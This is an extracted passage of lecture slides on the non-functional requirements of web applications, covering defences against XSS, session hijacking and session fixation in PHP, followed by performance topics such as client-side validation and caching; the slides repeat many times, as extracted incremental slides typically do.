Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS (Cont’d)I When the above rules are followed, the only
place remaining to insert data is in thecontent of a HTML element, for examplediv, p or td.
I When accepting input that might later beinserted in a HTML document, always usethe htmlentities function to convertHTML special characters like < and & toentities (< and &).htmlentities($data, ENT_QUOTES);
I The ENT_QUOTES parameter specifiesthat both single and double quotes shall beconverted.
38 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS (Cont’d)I When the above rules are followed, the only
place remaining to insert data is in thecontent of a HTML element, for examplediv, p or td.
I When accepting input that might later beinserted in a HTML document, always usethe htmlentities function to convertHTML special characters like < and & toentities (< and &).htmlentities($data, ENT_QUOTES);
I The ENT_QUOTES parameter specifiesthat both single and double quotes shall beconverted.
38 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting XSS (Cont’d)I When the above rules are followed, the only
place remaining to insert data is in thecontent of a HTML element, for examplediv, p or td.
I When accepting input that might later beinserted in a HTML document, always usethe htmlentities function to convertHTML special characters like < and & toentities (< and &).htmlentities($data, ENT_QUOTES);
I The ENT_QUOTES parameter specifiesthat both single and double quotes shall beconverted.
38 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
39 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Impersonation
I To impersonate someone means that anattacker steals the id of a legitimate user,thereby becoming able to perform actionsfor which the legitimate user will be heldresponsible.
I Two ways this can happen is that theattacker steals a password of a legitimateuser, or uses a session of an authenticated(logged in) user.
40 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Impersonation
I To impersonate someone means that anattacker steals the id of a legitimate user,thereby becoming able to perform actionsfor which the legitimate user will be heldresponsible.
I Two ways this can happen is that theattacker steals a password of a legitimateuser, or uses a session of an authenticated(logged in) user.
40 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password Protection
I We have already covered how to protect apassword in a datastore by hashing it.
I It is also necessary to protect the passwordwhen it is transmitted from client to server.
I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!
I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).
41 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password Protection
I We have already covered how to protect apassword in a datastore by hashing it.
I It is also necessary to protect the passwordwhen it is transmitted from client to server.
I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!
I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).
41 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password Protection
I We have already covered how to protect apassword in a datastore by hashing it.
I It is also necessary to protect the passwordwhen it is transmitted from client to server.
I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!
I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).
41 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Password Protection
I We have already covered how to protect apassword in a datastore by hashing it.
I It is also necessary to protect the passwordwhen it is transmitted from client to server.
I This is achieved by using encryptedcommunication, typically HTTPS. Alwaysuse HTTPS when a password is sent!
I If not, the password is sent in clear text andanyone with access to the communicationlink can see it (commonly calledeavesdropping).
41 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Session Forgery
I The only thing telling the server that tworequests belong to the same session, andthereby the same user, is the session id.
I This id must be included in every requestduring the session, as a cookie, part of theURL or some other way.
I If an attacker is able to get (or set) thesession id of an authenticated user, there isnothing stopping the attacker frompresenting that id to the server andimpersonate that user.
42 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Session Forgery
I The only thing telling the server that tworequests belong to the same session, andthereby the same user, is the session id.
I This id must be included in every requestduring the session, as a cookie, part of theURL or some other way.
I If an attacker is able to get (or set) thesession id of an authenticated user, there isnothing stopping the attacker frompresenting that id to the server andimpersonate that user.
42 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Session Forgery
I The only thing telling the server that tworequests belong to the same session, andthereby the same user, is the session id.
I This id must be included in every requestduring the session, as a cookie, part of theURL or some other way.
I If an attacker is able to get (or set) thesession id of an authenticated user, there isnothing stopping the attacker frompresenting that id to the server andimpersonate that user.
42 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session HijackingI Session hijacking means that a malicious user uses
the same session as an authenticated user.
I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.
I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.
I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.
43 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session HijackingI Session hijacking means that a malicious user uses
the same session as an authenticated user.
I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.
I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.
I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.
43 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session HijackingI Session hijacking means that a malicious user uses
the same session as an authenticated user.
I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.
I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.
I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.
43 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session HijackingI Session hijacking means that a malicious user uses
the same session as an authenticated user.
I The first thing is to prohibit eavesdropping, by usingHTTPS for all requests made by an authenticateduser.
I Also, setting the Secure cookie attribute instructsweb browsers to send the cookie only overencrypted, e.g., HTTPS, links. This is specified bysetting session.cookie_secure true inthe php.ini configuration file.
I Setting the HttpOnly attribute by specifyingsession.cookie_httponly true prohibitsJavaScript code to read the cookie via the DOMdocument.cookie JavaScript object.
43 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session Hijacking(Cont’d)
I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.
I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.
I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.
I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.
44 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session Hijacking(Cont’d)
I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.
I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.
I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.
I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.
44 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session Hijacking(Cont’d)
I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.
I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.
I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.
I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.
44 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibiting Session Hijacking(Cont’d)
I Another complementary practice is to rely not onlyon the session id for identification, but also onbrowser fingerprinting.
I Browsers normally include many headers in eachrequest, for example User-Agent, whichidentifies the browser type.
I To associate all this information with the session canreveal if a request comes from another browser. It ishighly unlikely that a legitimate user changesbrowser during a session.
I This method is not 100% secure, the attacker mightbe able to imitate the browser’s fingerprint, but it stilla recommended complementary method to preventsession hijacking.
44 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit Session FixationI Session fixation means that an attacker is able to
decide which session id a user will have after havinglogged in.
I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.
I When the legitimate user later has logged in, anattack can be launched with the preset session id.
I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.
I In PHP, session id is changed with thesession_regenerate_id function.
45 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit Session FixationI Session fixation means that an attacker is able to
decide which session id a user will have after havinglogged in.
I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.
I When the legitimate user later has logged in, anattack can be launched with the preset session id.
I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.
I In PHP, session id is changed with thesession_regenerate_id function.
45 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit Session FixationI Session fixation means that an attacker is able to
decide which session id a user will have after havinglogged in.
I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.
I When the legitimate user later has logged in, anattack can be launched with the preset session id.
I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.
I In PHP, session id is changed with thesession_regenerate_id function.
45 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit Session FixationI Session fixation means that an attacker is able to
decide which session id a user will have after havinglogged in.
I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.
I When the legitimate user later has logged in, anattack can be launched with the preset session id.
I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.
I In PHP, session id is changed with thesession_regenerate_id function.
45 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Prohibit Session FixationI Session fixation means that an attacker is able to
decide which session id a user will have after havinglogged in.
I This might be done by tricking the legitimate user tovisit the attackers site, where a cookie with the namePHPSESSID is set.
I When the legitimate user later has logged in, anattack can be launched with the preset session id.
I To prevent this, always change the session id afterlogin, or whenever a user gains increased privileges.
I In PHP, session id is changed with thesession_regenerate_id function.
45 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Force the User to AuthenticateI Do not assume that a user is authenticated just
because there is a session.
I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.
I To stop such an attack, it must be possible todetermine if a user is authenticated or not.
I This can be done by storing an object with userinformation in the session on successful log in.
I Only if there is such information is the user loggedin, remember to check for all requests!
I A positive side effect is that it easy to get informationabout the current user from this object.
46 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Force the User to AuthenticateI Do not assume that a user is authenticated just
because there is a session.
I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.
I To stop such an attack, it must be possible todetermine if a user is authenticated or not.
I This can be done by storing an object with userinformation in the session on successful log in.
I Only if there is such information is the user loggedin, remember to check for all requests!
I A positive side effect is that it easy to get informationabout the current user from this object.
46 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Force the User to AuthenticateI Do not assume that a user is authenticated just
because there is a session.
I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.
I To stop such an attack, it must be possible todetermine if a user is authenticated or not.
I This can be done by storing an object with userinformation in the session on successful log in.
I Only if there is such information is the user loggedin, remember to check for all requests!
I A positive side effect is that it easy to get informationabout the current user from this object.
46 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Force the User to AuthenticateI Do not assume that a user is authenticated just
because there is a session.
I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.
I To stop such an attack, it must be possible todetermine if a user is authenticated or not.
I This can be done by storing an object with userinformation in the session on successful log in.
I Only if there is such information is the user loggedin, remember to check for all requests!
I A positive side effect is that it easy to get informationabout the current user from this object.
46 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Force the User to AuthenticateI Do not assume that a user is authenticated just
because there is a session.
I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.
I To stop such an attack, it must be possible todetermine if a user is authenticated or not.
I This can be done by storing an object with userinformation in the session on successful log in.
I Only if there is such information is the user loggedin, remember to check for all requests!
I A positive side effect is that it easy to get informationabout the current user from this object.
46 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Force the User to AuthenticateI Do not assume that a user is authenticated just
because there is a session.
I A malicious user might create a cookie with thename PHPSESSID, which is the name used byPHP for session handling. The presence of such acookie will start a session.
I To stop such an attack, it must be possible todetermine if a user is authenticated or not.
I This can be done by storing an object with userinformation in the session on successful log in.
I Only if there is such information is the user loggedin, remember to check for all requests!
I A positive side effect is that it easy to get informationabout the current user from this object.
46 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Enable Logging Out
I Provide an easily accessible logout button,available on every page.
I If not, an unaware user might forget to logout, thereby preserving the session for anunnecessarily long period, increasing therisk of an attack.
47 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Enable Logging Out
I Provide an easily accessible logout button,available on every page.
I If not, an unaware user might forget to logout, thereby preserving the session for anunnecessarily long period, increasing therisk of an attack.
47 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Section
Non-Functional Requirements
Security
PerformanceClient-Side ValidationCachingPersistent Connections
48 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Performance?I Performance is a vague concept, many
different kinds of performance can beconsidered.
I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.
I Here, we will consider the following twoquantities:
I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.
I Throughput, which is the amount of requestsserved during a specified time period.
49 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Performance?I Performance is a vague concept, many
different kinds of performance can beconsidered.
I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.
I Here, we will consider the following twoquantities:
I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.
I Throughput, which is the amount of requestsserved during a specified time period.
49 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Performance?I Performance is a vague concept, many
different kinds of performance can beconsidered.
I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.
I Here, we will consider the following twoquantities:
I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.
I Throughput, which is the amount of requestsserved during a specified time period.
49 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Performance?I Performance is a vague concept, many
different kinds of performance can beconsidered.
I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.
I Here, we will consider the following twoquantities:
I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.
I Throughput, which is the amount of requestsserved during a specified time period.
49 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
What Is Performance?I Performance is a vague concept, many
different kinds of performance can beconsidered.
I When talking about performance, it isnecessary to define exactly what isconsidered, and how it is measured.
I Here, we will consider the following twoquantities:
I Response time, which is the time between theend of the request and the beginning of theresponse. Also the point where time ismeasured must be defined, for example theouter firewall.
I Throughput, which is the amount of requestsserved during a specified time period.
49 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
50 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Client-Side Validation
I Client-side validation means that user inputis validated in JavaScript, in the browser.
I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.
I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.
I There must also be server-side validation,since we can never trust the client.
51 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Client-Side Validation
I Client-side validation means that user inputis validated in JavaScript, in the browser.
I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.
I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.
I There must also be server-side validation,since we can never trust the client.
51 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Client-Side Validation
I Client-side validation means that user inputis validated in JavaScript, in the browser.
I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.
I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.
I There must also be server-side validation,since we can never trust the client.
51 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Client-Side Validation
I Client-side validation means that user inputis validated in JavaScript, in the browser.
I Both response time and throughput areimproved by client-side validation, since norequest is sent to server when user input isinvalid.
I A reasonable amount of client-sidevalidation is to perform the same validationsas on the server.
I There must also be server-side validation,since we can never trust the client.
51 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
SectionNon-Functional Requirements
SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation
PerformanceClient-Side ValidationCachingPersistent Connections
52 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
CachingI Multiple request are sent when loading one
single page: images, JavaScript files, CSSfiles, etc.
I As an example, kth.se generates 34requests and dn.se generates 271.
I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.
I Response time and throughput improves alot by appropriate use of caches.
I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.
53 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
CachingI Multiple request are sent when loading one
single page: images, JavaScript files, CSSfiles, etc.
I As an example, kth.se generates 34requests and dn.se generates 271.
I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.
I Response time and throughput improves alot by appropriate use of caches.
I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.
53 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
CachingI Multiple request are sent when loading one
single page: images, JavaScript files, CSSfiles, etc.
I As an example, kth.se generates 34requests and dn.se generates 271.
I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.
I Response time and throughput improves alot by appropriate use of caches.
I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.
53 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
CachingI Multiple request are sent when loading one
single page: images, JavaScript files, CSSfiles, etc.
I As an example, kth.se generates 34requests and dn.se generates 271.
I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.
I Response time and throughput improves alot by appropriate use of caches.
I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.
53 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
CachingI Multiple request are sent when loading one
single page: images, JavaScript files, CSSfiles, etc.
I As an example, kth.se generates 34requests and dn.se generates 271.
I Many of these resources change seldomand are therefore unnecessary to load fromserver each time.
I Response time and throughput improves alot by appropriate use of caches.
I When caching, the resources are loadedfrom the cache, which is closer to thebrowser and faster than the web server.
53 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Types of CachesI The most effective cache is the browser cache. A hit
in the browser cache eliminates network traffic.
I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.
I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org
I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)
54 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Types of CachesI The most effective cache is the browser cache. A hit
in the browser cache eliminates network traffic.
I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.
I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org
I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)
54 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Types of CachesI The most effective cache is the browser cache. A hit
in the browser cache eliminates network traffic.
I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.
I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org
I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)
54 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Types of CachesI The most effective cache is the browser cache. A hit
in the browser cache eliminates network traffic.
I Proxy caches are typically set up by ISPs to reducetheir network traffic. Squid, squid-cache.org isan example of a proxy cache.
I A gateway cache is set up by the serveradministrator, in front of the web server. Acommonly used gateway cache is Varnish,www.varnish-cache.org
I Content delivery networks, CDNs, distributegateway caches throughout the Internet and sellcaching to interested Web sites. Common examplesare Akamai (used by svtplay.se) and CloudFlare(used by cdnjs)
54 / 68
Non-FunctionalRequirements
Non-FunctionalRequirements
SecurityFile System Security
Input Filtering
Database Security
Password Encryption
Cross Site Scripting, XSS
Impersonation
PerformanceClient-Side Validation
Caching
Persistent Connections
Types of Caches (Cont’d)
I The web server itself has a cache, seehttpd.apache.org/docs/2.2/caching.html for information oncaching with apache. Although this doesnot reduce network traffic, it might eliminatedatabase calls and PHP execution.
